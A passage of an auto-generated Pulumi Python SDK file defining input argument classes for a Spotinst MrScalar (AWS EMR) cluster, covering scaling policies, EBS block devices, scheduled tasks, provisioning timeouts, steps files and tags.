:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Must contain the value: `AWS/ElasticMapReduce`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
"""
The value that the specified statistic is compared to.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[float]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> pulumi.Input[str]:
"""
The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: pulumi.Input[str]):
pulumi.set(self, "unit", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Max target capacity for scale down.
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximum to set when scale is needed.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Min target capacity for scale up.
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimum to set when scale is needed.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time window in seconds over which the statistic is applied.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to set when scale is needed.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarCoreScalingUpPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Must contain the value: `AWS/ElasticMapReduce`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
"""
The value that the specified statistic is compared to.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[float]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> pulumi.Input[str]:
"""
The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: pulumi.Input[str]):
pulumi.set(self, "unit", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Max target capacity for scale down.
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximum to set when scale is needed.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
Min target capacity for scale up.
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimum to set when scale is needed.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time window in seconds over which the statistic is applied.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to set when scale is needed.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarInstanceWeightArgs:
def __init__(__self__, *,
instance_type: pulumi.Input[str],
weighted_capacity: pulumi.Input[int]):
"""
:param pulumi.Input[str] instance_type: The type of the instance.
:param pulumi.Input[int] weighted_capacity: The weight given to the associated instance type.
"""
pulumi.set(__self__, "instance_type", instance_type)
pulumi.set(__self__, "weighted_capacity", weighted_capacity)
@property
@pulumi.getter(name="instanceType")
def instance_type(self) -> pulumi.Input[str]:
"""
The type of the instance.
"""
return pulumi.get(self, "instance_type")
@instance_type.setter
def instance_type(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_type", value)
@property
@pulumi.getter(name="weightedCapacity")
def weighted_capacity(self) -> pulumi.Input[int]:
"""
The weight given to the associated instance type.
"""
return pulumi.get(self, "weighted_capacity")
@weighted_capacity.setter
def weighted_capacity(self, value: pulumi.Input[int]):
pulumi.set(self, "weighted_capacity", value)
@pulumi.input_type
class MrScalarMasterEbsBlockDeviceArgs:
def __init__(__self__, *,
size_in_gb: pulumi.Input[int],
volume_type: pulumi.Input[str],
iops: Optional[pulumi.Input[int]] = None,
volumes_per_instance: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
:param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
:param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
:param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the master group.
"""
pulumi.set(__self__, "size_in_gb", size_in_gb)
pulumi.set(__self__, "volume_type", volume_type)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if volumes_per_instance is not None:
pulumi.set(__self__, "volumes_per_instance", volumes_per_instance)
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> pulumi.Input[int]:
"""
Size of the volume, in GBs.
"""
return pulumi.get(self, "size_in_gb")
@size_in_gb.setter
def size_in_gb(self, value: pulumi.Input[int]):
pulumi.set(self, "size_in_gb", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> pulumi.Input[str]:
"""
volume type. Allowed values are 'gp2', 'io1' and others.
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: pulumi.Input[str]):
pulumi.set(self, "volume_type", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
IOPS for the volume. Required in some volume types, such as io1.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter(name="volumesPerInstance")
def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
"""
Amount of volumes per instance in the master group.
"""
return pulumi.get(self, "volumes_per_instance")
@volumes_per_instance.setter
def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarProvisioningTimeoutArgs:
def __init__(__self__, *,
timeout: pulumi.Input[int],
timeout_action: pulumi.Input[str]):
"""
:param pulumi.Input[int] timeout: The amount of time (minutes) after which the cluster is automatically terminated if it's still in provisioning status. Minimum: '15'.
:param pulumi.Input[str] timeout_action: The action to take if the timeout is exceeded. Valid values: `terminate`, `terminateAndRetry`.
"""
pulumi.set(__self__, "timeout", timeout)
pulumi.set(__self__, "timeout_action", timeout_action)
@property
@pulumi.getter
def timeout(self) -> pulumi.Input[int]:
"""
The amount of time (minutes) after which the cluster is automatically terminated if it's still in provisioning status. Minimum: '15'.
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: pulumi.Input[int]):
pulumi.set(self, "timeout", value)
@property
@pulumi.getter(name="timeoutAction")
def timeout_action(self) -> pulumi.Input[str]:
"""
The action to take if the timeout is exceeded. Valid values: `terminate`, `terminateAndRetry`.
"""
return pulumi.get(self, "timeout_action")
@timeout_action.setter
def timeout_action(self, value: pulumi.Input[str]):
pulumi.set(self, "timeout_action", value)
@pulumi.input_type
class MrScalarScheduledTaskArgs:
def __init__(__self__, *,
cron: pulumi.Input[str],
instance_group_type: pulumi.Input[str],
task_type: pulumi.Input[str],
desired_capacity: Optional[pulumi.Input[str]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
max_capacity: Optional[pulumi.Input[str]] = None,
min_capacity: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] cron: A cron expression representing the schedule for the task.
:param pulumi.Input[str] instance_group_type: Select the EMR instance groups to execute the scheduled task on. Valid values: `task`.
:param pulumi.Input[str] task_type: The type of task to be scheduled. Valid values: `setCapacity`.
:param pulumi.Input[str] desired_capacity: New desired capacity for the elastigroup.
:param pulumi.Input[bool] is_enabled: Enable/Disable the specified scheduling task.
:param pulumi.Input[str] max_capacity: New max capacity for the elastigroup.
:param pulumi.Input[str] min_capacity: New min capacity for the elastigroup.
"""
pulumi.set(__self__, "cron", cron)
pulumi.set(__self__, "instance_group_type", instance_group_type)
pulumi.set(__self__, "task_type", task_type)
if desired_capacity is not None:
pulumi.set(__self__, "desired_capacity", desired_capacity)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if max_capacity is not None:
pulumi.set(__self__, "max_capacity", max_capacity)
if min_capacity is not None:
pulumi.set(__self__, "min_capacity", min_capacity)
@property
@pulumi.getter
def cron(self) -> pulumi.Input[str]:
"""
A cron expression representing the schedule for the task.
"""
return pulumi.get(self, "cron")
@cron.setter
def cron(self, value: pulumi.Input[str]):
pulumi.set(self, "cron", value)
@property
@pulumi.getter(name="instanceGroupType")
def instance_group_type(self) -> pulumi.Input[str]:
"""
Select the EMR instance groups to execute the scheduled task on. Valid values: `task`.
"""
return pulumi.get(self, "instance_group_type")
@instance_group_type.setter
def instance_group_type(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_group_type", value)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
The type of task to be scheduled. Valid values: `setCapacity`.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> Optional[pulumi.Input[str]]:
"""
New desired capacity for the elastigroup.
"""
return pulumi.get(self, "desired_capacity")
@desired_capacity.setter
def desired_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "desired_capacity", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/Disable the specified scheduling task.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="maxCapacity")
def max_capacity(self) -> Optional[pulumi.Input[str]]:
"""
New max capacity for the elastigroup.
"""
return pulumi.get(self, "max_capacity")
@max_capacity.setter
def max_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_capacity", value)
@property
@pulumi.getter(name="minCapacity")
def min_capacity(self) -> Optional[pulumi.Input[str]]:
"""
New min capacity for the elastigroup.
"""
return pulumi.get(self, "min_capacity")
@min_capacity.setter
def min_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_capacity", value)
@pulumi.input_type
class MrScalarStepsFileArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str]):
"""
:param pulumi.Input[str] bucket: S3 Bucket name for bootstrap actions.
:param pulumi.Input[str] key: S3 key for bootstrap actions.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
S3 Bucket name for bootstrap actions.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
S3 key for bootstrap actions.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarTagArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] key: S3 key for bootstrap actions.
:param pulumi.Input[str] value: Tag value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
S3 key for bootstrap actions.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Tag value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class MrScalarTaskEbsBlockDeviceArgs:
def __init__(__self__, *,
size_in_gb: pulumi.Input[int],
volume_type: pulumi.Input[str],
iops: Optional[pulumi.Input[int]] = None,
volumes_per_instance: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
:param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
:param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
:param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the master group.
"""
pulumi.set(__self__, "size_in_gb", size_in_gb)
pulumi.set(__self__, "volume_type", volume_type)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if volumes_per_instance is not None:
pulumi.set(__self__, "volumes_per_instance", volumes_per_instance)
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> pulumi.Input[int]:
"""
Size of the volume, in GBs.
"""
return pulumi.get(self, "size_in_gb")
@size_in_gb.setter
def size_in_gb(self, value: pulumi.Input[int]):
pulumi.set(self, "size_in_gb", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> pulumi.Input[str]:
"""
volume type. Allowed values are 'gp2', 'io1' and others.
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: pulumi.Input[str]):
pulumi.set(self, "volume_type", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
IOPS for the volume. Required in some volume types, such as io1.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter(name="volumesPerInstance")
def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
"""
Amount of volumes per instance in the master group.
"""
return pulumi.get(self, "volumes_per_instance")
@volumes_per_instance.setter
def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarTaskScalingDownPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
